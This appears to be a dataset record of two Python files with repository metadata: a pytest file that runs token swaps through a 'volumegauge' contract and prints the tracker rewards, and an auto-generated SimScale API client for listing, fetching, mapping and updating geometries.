| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d87fc414ece933ef900dba9d7f95b7affd53592d
| 5,111
|
py
|
Python
|
tests/test_volumegauge.py
|
manifoldfinance/utilities
|
d86d2bfb86925352ada81a2a53d50900c9105bcc
|
[
"MIT"
] | null | null | null |
tests/test_volumegauge.py
|
manifoldfinance/utilities
|
d86d2bfb86925352ada81a2a53d50900c9105bcc
|
[
"MIT"
] | null | null | null |
tests/test_volumegauge.py
|
manifoldfinance/utilities
|
d86d2bfb86925352ada81a2a53d50900c9105bcc
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
import pytest
def test_exchange_cdai_to_cusdc(volumegauge, cDAI, cUSDC, tracker, accounts):
    """Swap cDAI -> cUSDC through the gauge and print the recorded track data."""
    reward_before = tracker.rewardAmount()
    volumegauge.exchange(0, 1, 10 ** 8, 0, {'from': accounts[0]})
    # Inspect the most recent track record written for the sender.
    size = tracker.trackDataSize(accounts[0])
    rec = tracker.trackData(accounts[0], size - 1)
    reward_after = tracker.rewardAmount()
    print(f"token_x : {rec[0]}")
    print(f"price_x : {rec[1]} ({float(rec[1]) / 10 ** 8} USD)")
    print(f"amount_x : {rec[2]} ({float(rec[2]) / 10 ** cDAI.decimals()} tokens)")
    print(f"token_y : {rec[3]}")
    print(f"price_y : {rec[4]} ({float(rec[4]) / 10 ** 8} USD)")
    print(f"amount_y : {rec[5]} ({float(rec[5]) / 10 ** cUSDC.decimals()} tokens)")
    print(f"source_addr : {rec[6]}")
    print(f"contract_addr : {rec[7]}")
    print(f"time_stamp : {rec[8]}")
    print(f"reward_amount : {reward_after} (USD, decimals are 8 digits)")
    print(f"increased_reward_amount_in_USD : {float(reward_after - reward_before) / 10 ** 8} USD")
def test_exchange_cusdc_to_cdai(volumegauge, cUSDC, cDAI, tracker, accounts):
    """Swap cUSDC -> cDAI through the gauge and print the recorded track data."""
    reward_before = tracker.rewardAmount()
    volumegauge.exchange(1, 0, 10 ** 8, 0, {'from': accounts[0]})
    # Inspect the most recent track record written for the sender.
    size = tracker.trackDataSize(accounts[0])
    rec = tracker.trackData(accounts[0], size - 1)
    reward_after = tracker.rewardAmount()
    print(f"token_x : {rec[0]}")
    print(f"price_x : {rec[1]} ({float(rec[1]) / 10 ** 8} USD)")
    print(f"amount_x : {rec[2]} ({float(rec[2]) / 10 ** cUSDC.decimals()} tokens)")
    print(f"token_y : {rec[3]}")
    print(f"price_y : {rec[4]} ({float(rec[4]) / 10 ** 8} USD)")
    print(f"amount_y : {rec[5]} ({float(rec[5]) / 10 ** cDAI.decimals()} tokens)")
    print(f"source_addr : {rec[6]}")
    print(f"contract_addr : {rec[7]}")
    print(f"time_stamp : {rec[8]}")
    print(f"reward_amount : {reward_after} (USD, decimals are 8 digits)")
    print(f"increased_reward_amount_in_USD : {float(reward_after - reward_before) / 10 ** 8} USD")
def test_exchange_underlying_dai_to_usdc(volumegauge, DAI, USDC, tracker, accounts):
    """Swap underlying DAI -> USDC and print the recorded track data."""
    reward_before = tracker.rewardAmount()
    volumegauge.exchange_underlying(0, 1, 10 ** 18, 0, {'from': accounts[0]})
    # Inspect the most recent track record written for the sender.
    size = tracker.trackDataSize(accounts[0])
    rec = tracker.trackData(accounts[0], size - 1)
    reward_after = tracker.rewardAmount()
    print(f"token_x : {rec[0]}")
    print(f"price_x : {rec[1]} ({float(rec[1]) / 10 ** 8} USD)")
    print(f"amount_x : {rec[2]} ({float(rec[2]) / 10 ** DAI.decimals()} tokens)")
    print(f"token_y : {rec[3]}")
    print(f"price_y : {rec[4]} ({float(rec[4]) / 10 ** 8} USD)")
    print(f"amount_y : {rec[5]} ({float(rec[5]) / 10 ** USDC.decimals()} tokens)")
    print(f"source_addr : {rec[6]}")
    print(f"contract_addr : {rec[7]}")
    print(f"time_stamp : {rec[8]}")
    print(f"reward_amount : {reward_after} (USD, decimals are 8 digits)")
    print(f"increased_reward_amount_in_USD : {float(reward_after - reward_before) / 10 ** 8} USD")
def test_exchange_underlying_usdc_to_dai(volumegauge, USDC, DAI, tracker, accounts):
    """Swap underlying USDC -> DAI and print the recorded track data."""
    reward_before = tracker.rewardAmount()
    volumegauge.exchange_underlying(1, 0, 10 ** 6, 0, {'from': accounts[0]})
    # Inspect the most recent track record written for the sender.
    size = tracker.trackDataSize(accounts[0])
    rec = tracker.trackData(accounts[0], size - 1)
    reward_after = tracker.rewardAmount()
    print(f"token_x : {rec[0]}")
    print(f"price_x : {rec[1]} ({float(rec[1]) / 10 ** 8} USD)")
    print(f"amount_x : {rec[2]} ({float(rec[2]) / 10 ** USDC.decimals()} tokens)")
    print(f"token_y : {rec[3]}")
    print(f"price_y : {rec[4]} ({float(rec[4]) / 10 ** 8} USD)")
    print(f"amount_y : {rec[5]} ({float(rec[5]) / 10 ** DAI.decimals()} tokens)")
    print(f"source_addr : {rec[6]}")
    print(f"contract_addr : {rec[7]}")
    print(f"time_stamp : {rec[8]}")
    print(f"reward_amount : {reward_after} (USD, decimals are 8 digits)")
    print(f"increased_reward_amount_in_USD : {float(reward_after - reward_before) / 10 ** 8} USD")
| 67.25
| 122
| 0.640579
| 705
| 5,111
| 4.377305
| 0.08227
| 0.186649
| 0.139987
| 0.08814
| 0.944588
| 0.934219
| 0.934219
| 0.934219
| 0.934219
| 0.889501
| 0
| 0.035253
| 0.167482
| 5,111
| 75
| 123
| 68.146667
| 0.690012
| 0.003326
| 0
| 0.753623
| 0
| 0
| 0.176713
| 0.023562
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057971
| false
| 0
| 0.014493
| 0
| 0.072464
| 0.637681
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
d89bdadf82f192fb92417943ea792b5a680ab1ea
| 32,212
|
py
|
Python
|
simscale_sdk/api/geometries_api.py
|
slainesimscale/simscale-python-sdk
|
db483eeabe558e55d020f5f829a3bf13c9c287a7
|
[
"MIT"
] | 8
|
2021-01-22T13:41:03.000Z
|
2022-01-03T09:00:10.000Z
|
simscale_sdk/api/geometries_api.py
|
slainesimscale/simscale-python-sdk
|
db483eeabe558e55d020f5f829a3bf13c9c287a7
|
[
"MIT"
] | null | null | null |
simscale_sdk/api/geometries_api.py
|
slainesimscale/simscale-python-sdk
|
db483eeabe558e55d020f5f829a3bf13c9c287a7
|
[
"MIT"
] | 3
|
2021-03-18T15:52:52.000Z
|
2022-01-03T08:59:30.000Z
|
# coding: utf-8
"""
SimScale API
The version of the OpenAPI document: 0.0.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from simscale_sdk.api_client import ApiClient
from simscale_sdk.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class GeometriesApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_geometries(self, project_id, **kwargs):  # noqa: E501
    """List geometries within a project  # noqa: E501

    Only valid geometries that can be used for a simulation setup are included.  # noqa: E501
    Synchronous by default; pass async_req=True for an asynchronous
    request, in which case the returned thread's get() yields the result.

    >>> thread = api.get_geometries(project_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str project_id: The project ID (required)
    :param int limit: The number of items to return.
    :param int page: The page number. Use in combination with limit.
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: Geometries
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: force return of the deserialized body only,
    # not the (data, status, headers) tuple.
    return self.get_geometries_with_http_info(
        project_id, **{**kwargs, '_return_http_data_only': True})  # noqa: E501
def get_geometries_with_http_info(self, project_id, **kwargs):  # noqa: E501
    """List geometries within a project  # noqa: E501

    Only valid geometries that can be used for a simulation setup are included.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_geometries_with_http_info(project_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str project_id: The project ID (required)
    :param int limit: The number of items to return.
    :param int page: The page number. Use in combination with limit.
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(Geometries, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot the call's arguments; taken first so it contains exactly
    # 'self', the declared parameters, and the raw 'kwargs' dict.
    local_var_params = locals()

    # Endpoint-specific parameters accepted via **kwargs.
    all_params = [
        'project_id',
        'limit',
        'page'
    ]
    # Generic request-control options supported by every endpoint.
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout'
        ]
    )

    # Reject unknown keyword arguments, then flatten the accepted ones
    # into local_var_params for uniform lookup below.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_geometries" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'project_id' is set
    if self.api_client.client_side_validation and ('project_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['project_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `project_id` when calling `get_geometries`")  # noqa: E501

    # Client-side range checks mirror the API contract:
    # 10 <= limit <= 1000 and 1 <= page <= 1000.
    if self.api_client.client_side_validation and 'limit' in local_var_params and local_var_params['limit'] > 1000:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `limit` when calling `get_geometries`, must be a value less than or equal to `1000`")  # noqa: E501
    if self.api_client.client_side_validation and 'limit' in local_var_params and local_var_params['limit'] < 10:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `limit` when calling `get_geometries`, must be a value greater than or equal to `10`")  # noqa: E501
    if self.api_client.client_side_validation and 'page' in local_var_params and local_var_params['page'] > 1000:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `page` when calling `get_geometries`, must be a value less than or equal to `1000`")  # noqa: E501
    if self.api_client.client_side_validation and 'page' in local_var_params and local_var_params['page'] < 1:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `page` when calling `get_geometries`, must be a value greater than or equal to `1`")  # noqa: E501

    collection_formats = {}

    # Fill in the {projectId} path template variable.
    path_params = {}
    if 'project_id' in local_var_params:
        path_params['projectId'] = local_var_params['project_id']  # noqa: E501

    # Optional pagination query parameters, omitted when not supplied.
    query_params = []
    if 'limit' in local_var_params and local_var_params['limit'] is not None:  # noqa: E501
        query_params.append(('limit', local_var_params['limit']))  # noqa: E501
    if 'page' in local_var_params and local_var_params['page'] is not None:  # noqa: E501
        query_params.append(('page', local_var_params['page']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET request: no request body is sent.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['apiKey']  # noqa: E501

    return self.api_client.call_api(
        '/projects/{projectId}/geometries', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Geometries',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_geometry(self, project_id, geometry_id, **kwargs):  # noqa: E501
    """Get information about the geometry  # noqa: E501

    Synchronous by default; pass async_req=True for an asynchronous
    request, in which case the returned thread's get() yields the result.

    >>> thread = api.get_geometry(project_id, geometry_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str project_id: The project ID (required)
    :param str geometry_id: The geometry ID (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: Geometry
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: force return of the deserialized body only,
    # not the (data, status, headers) tuple.
    return self.get_geometry_with_http_info(
        project_id, geometry_id,
        **{**kwargs, '_return_http_data_only': True})  # noqa: E501
def get_geometry_with_http_info(self, project_id, geometry_id, **kwargs):  # noqa: E501
    """Get information about the geometry  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_geometry_with_http_info(project_id, geometry_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str project_id: The project ID (required)
    :param str geometry_id: The geometry ID (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(Geometry, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot the call's arguments; taken first so it contains exactly
    # 'self', the declared parameters, and the raw 'kwargs' dict.
    local_var_params = locals()

    # Endpoint-specific parameters accepted via **kwargs.
    all_params = [
        'project_id',
        'geometry_id'
    ]
    # Generic request-control options supported by every endpoint.
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout'
        ]
    )

    # Reject unknown keyword arguments, then flatten the accepted ones
    # into local_var_params for uniform lookup below.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_geometry" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'project_id' is set
    if self.api_client.client_side_validation and ('project_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['project_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `project_id` when calling `get_geometry`")  # noqa: E501
    # verify the required parameter 'geometry_id' is set
    if self.api_client.client_side_validation and ('geometry_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['geometry_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `geometry_id` when calling `get_geometry`")  # noqa: E501

    collection_formats = {}

    # Fill in the {projectId} and {geometryId} path template variables.
    path_params = {}
    if 'project_id' in local_var_params:
        path_params['projectId'] = local_var_params['project_id']  # noqa: E501
    if 'geometry_id' in local_var_params:
        path_params['geometryId'] = local_var_params['geometry_id']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET request: no request body is sent.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['apiKey']  # noqa: E501

    return self.api_client.call_api(
        '/projects/{projectId}/geometries/{geometryId}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Geometry',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_geometry_mappings(self, project_id, geometry_id, **kwargs):  # noqa: E501
    """Describe id mapping of the geometry  # noqa: E501

    Returns the mapping between SimScale's internal topological-entity
    names (e.g. `B1_TE5`) and a detailed description of each entity:
    entity class (body or face), original body/entity names, attributes
    such as `SDL/TYSA_NAME` or `SDL/TYSA_COLOUR`, and the path from the
    model root. Note there is no guaranteed 1:1 mapping between internal
    and original names because import options may modify the topology.
    Synchronous by default; pass async_req=True for an asynchronous
    request, in which case the returned thread's get() yields the result.

    >>> thread = api.get_geometry_mappings(project_id, geometry_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str project_id: The project ID (required)
    :param str geometry_id: The geometry ID (required)
    :param int limit: The number of items to return.
    :param int page: The page number. Use in combination with limit.
    :param str _class: The entity class to filter.
    :param list[str] bodies: The body names to filter. If multiple body names are provided any match.
    :param list[str] entities: The entity names to filter. If multiple entity names are provided any match.
    :param list[str] attributes: The attribute names to filter. If multiple attribute names are provided any match.
    :param list[str] values: The attribute values to filter. If multiple attribute values are provided any match.
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: GeometryMappings
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: force return of the deserialized body only,
    # not the (data, status, headers) tuple.
    return self.get_geometry_mappings_with_http_info(
        project_id, geometry_id,
        **{**kwargs, '_return_http_data_only': True})  # noqa: E501
def get_geometry_mappings_with_http_info(self, project_id, geometry_id, **kwargs):  # noqa: E501
    """Describe id mapping of the geometry  # noqa: E501

    Assignment of topological entities (faces, bodies) in the simulation
    setup is a non-trivial task. Complex models can consist of several
    assemblies which may contain multiple occurrences of bodies and their
    entities. In order to describe an assignment unambiguously the full
    path from the root part of the model to the actual topological entity
    is required. SimScale generates unique internal names for all
    topological entities of a model during the geometry import which are
    used for assignments within the simulation spec. Examples of internal
    names are `B1_TE5` or `A1_I26_A5_I27_B102_TE196`. This API endpoint
    allows to retrieve a mapping between the internal names and a detailed
    description of the entities which includes: * The topological entity
    class (body or face) * The original body and entity names * Entity
    attributes like `SDL/TYSA_NAME` or `SDL/TYSA_COLOUR` * The path from
    the root of the model Please note that during geometry import the
    model's topology can be modified (e.g. facet split and other import
    options) which means that there is no 1:1 mapping between the internal
    and original names.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_geometry_mappings_with_http_info(project_id, geometry_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str project_id: The project ID (required)
    :param str geometry_id: The geometry ID (required)
    :param int limit: The number of items to return.
    :param int page: The page number. Use in combination with limit.
    :param str _class: The entity class to filter.
    :param list[str] bodies: The body names to filter. If multiple body names are provided any match.
    :param list[str] entities: The entity names to filter. If multiple entity names are provided any match.
    :param list[str] attributes: The attribute names to filter. If multiple attribute names are provided any match.
    :param list[str] values: The attribute values to filter. If multiple attribute values are provided any match.
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(GeometryMappings, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot the call's arguments; taken first so it contains exactly
    # 'self', the declared parameters, and the raw 'kwargs' dict.
    local_var_params = locals()

    # Endpoint-specific parameters accepted via **kwargs.
    all_params = [
        'project_id',
        'geometry_id',
        'limit',
        'page',
        '_class',
        'bodies',
        'entities',
        'attributes',
        'values'
    ]
    # Generic request-control options supported by every endpoint.
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout'
        ]
    )

    # Reject unknown keyword arguments, then flatten the accepted ones
    # into local_var_params for uniform lookup below.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_geometry_mappings" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'project_id' is set
    if self.api_client.client_side_validation and ('project_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['project_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `project_id` when calling `get_geometry_mappings`")  # noqa: E501
    # verify the required parameter 'geometry_id' is set
    if self.api_client.client_side_validation and ('geometry_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['geometry_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `geometry_id` when calling `get_geometry_mappings`")  # noqa: E501

    # Client-side range checks mirror the API contract:
    # 10 <= limit <= 1000 and 1 <= page <= 1000.
    if self.api_client.client_side_validation and 'limit' in local_var_params and local_var_params['limit'] > 1000:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `limit` when calling `get_geometry_mappings`, must be a value less than or equal to `1000`")  # noqa: E501
    if self.api_client.client_side_validation and 'limit' in local_var_params and local_var_params['limit'] < 10:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `limit` when calling `get_geometry_mappings`, must be a value greater than or equal to `10`")  # noqa: E501
    if self.api_client.client_side_validation and 'page' in local_var_params and local_var_params['page'] > 1000:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `page` when calling `get_geometry_mappings`, must be a value less than or equal to `1000`")  # noqa: E501
    if self.api_client.client_side_validation and 'page' in local_var_params and local_var_params['page'] < 1:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `page` when calling `get_geometry_mappings`, must be a value greater than or equal to `1`")  # noqa: E501

    collection_formats = {}

    # Fill in the {projectId} and {geometryId} path template variables.
    path_params = {}
    if 'project_id' in local_var_params:
        path_params['projectId'] = local_var_params['project_id']  # noqa: E501
    if 'geometry_id' in local_var_params:
        path_params['geometryId'] = local_var_params['geometry_id']  # noqa: E501

    # Optional pagination and filter query parameters; list-valued
    # filters are serialized with the 'multi' collection format
    # (one query-string entry per element).
    query_params = []
    if 'limit' in local_var_params and local_var_params['limit'] is not None:  # noqa: E501
        query_params.append(('limit', local_var_params['limit']))  # noqa: E501
    if 'page' in local_var_params and local_var_params['page'] is not None:  # noqa: E501
        query_params.append(('page', local_var_params['page']))  # noqa: E501
    if '_class' in local_var_params and local_var_params['_class'] is not None:  # noqa: E501
        query_params.append(('class', local_var_params['_class']))  # noqa: E501
    if 'bodies' in local_var_params and local_var_params['bodies'] is not None:  # noqa: E501
        query_params.append(('bodies', local_var_params['bodies']))  # noqa: E501
        collection_formats['bodies'] = 'multi'  # noqa: E501
    if 'entities' in local_var_params and local_var_params['entities'] is not None:  # noqa: E501
        query_params.append(('entities', local_var_params['entities']))  # noqa: E501
        collection_formats['entities'] = 'multi'  # noqa: E501
    if 'attributes' in local_var_params and local_var_params['attributes'] is not None:  # noqa: E501
        query_params.append(('attributes', local_var_params['attributes']))  # noqa: E501
        collection_formats['attributes'] = 'multi'  # noqa: E501
    if 'values' in local_var_params and local_var_params['values'] is not None:  # noqa: E501
        query_params.append(('values', local_var_params['values']))  # noqa: E501
        collection_formats['values'] = 'multi'  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET request: no request body is sent.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['apiKey']  # noqa: E501

    return self.api_client.call_api(
        '/projects/{projectId}/geometries/{geometryId}/mappings', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='GeometryMappings',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_geometry(self, project_id, geometry_id, geometry, **kwargs):  # noqa: E501
    """Update geometry information  # noqa: E501

    Synchronous by default; pass async_req=True for an asynchronous
    request, in which case the returned thread's get() yields the result.

    >>> thread = api.update_geometry(project_id, geometry_id, geometry, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str project_id: The project ID (required)
    :param str geometry_id: The geometry ID (required)
    :param Geometry geometry: Geometry information to be updated (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: force return of the deserialized body only,
    # not the (data, status, headers) tuple.
    return self.update_geometry_with_http_info(
        project_id, geometry_id, geometry,
        **{**kwargs, '_return_http_data_only': True})  # noqa: E501
def update_geometry_with_http_info(self, project_id, geometry_id, geometry, **kwargs):  # noqa: E501
    """Update geometry information  # noqa: E501

    Builds and issues a ``PUT /projects/{projectId}/geometries/{geometryId}``
    request with ``geometry`` as the JSON body.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_geometry_with_http_info(project_id, geometry_id, geometry, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str project_id: The project ID (required)
    :param str geometry_id: The geometry ID (required)
    :param Geometry geometry: Geometry information to be updated (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot all call arguments (including the kwargs dict) before any
    # other locals are created.
    local_var_params = locals()

    all_params = [
        'project_id',
        'geometry_id',
        'geometry'
    ]
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout'
        ]
    )

    # Reject unknown keyword arguments, then flatten the accepted ones into
    # local_var_params so the request-building code below sees one dict.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_geometry" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # verify the required parameter 'project_id' is set
    if self.api_client.client_side_validation and ('project_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['project_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `project_id` when calling `update_geometry`")  # noqa: E501
    # verify the required parameter 'geometry_id' is set
    if self.api_client.client_side_validation and ('geometry_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['geometry_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `geometry_id` when calling `update_geometry`")  # noqa: E501
    # verify the required parameter 'geometry' is set
    if self.api_client.client_side_validation and ('geometry' not in local_var_params or  # noqa: E501
                                                   local_var_params['geometry'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `geometry` when calling `update_geometry`")  # noqa: E501

    collection_formats = {}

    # Map python snake_case params onto the camelCase path template keys.
    path_params = {}
    if 'project_id' in local_var_params:
        path_params['projectId'] = local_var_params['project_id']  # noqa: E501
    if 'geometry_id' in local_var_params:
        path_params['geometryId'] = local_var_params['geometry_id']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # The geometry object is sent as the request body.
    body_params = None
    if 'geometry' in local_var_params:
        body_params = local_var_params['geometry']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['apiKey']  # noqa: E501

    return self.api_client.call_api(
        '/projects/{projectId}/geometries/{geometryId}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
| 54.320405
| 1,139
| 0.627282
| 3,879
| 32,212
| 4.993555
| 0.072441
| 0.047496
| 0.077336
| 0.027259
| 0.935519
| 0.932989
| 0.929633
| 0.927414
| 0.90857
| 0.907537
| 0
| 0.01902
| 0.299795
| 32,212
| 592
| 1,140
| 54.412162
| 0.839769
| 0.445424
| 0
| 0.665563
| 1
| 0.02649
| 0.223643
| 0.037069
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029801
| false
| 0
| 0.016556
| 0
| 0.076159
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d8d96d08297ae19f982bb7afb1f29aaf61d1cb8d
| 1,872
|
py
|
Python
|
python/models/fast_conv_segment.py
|
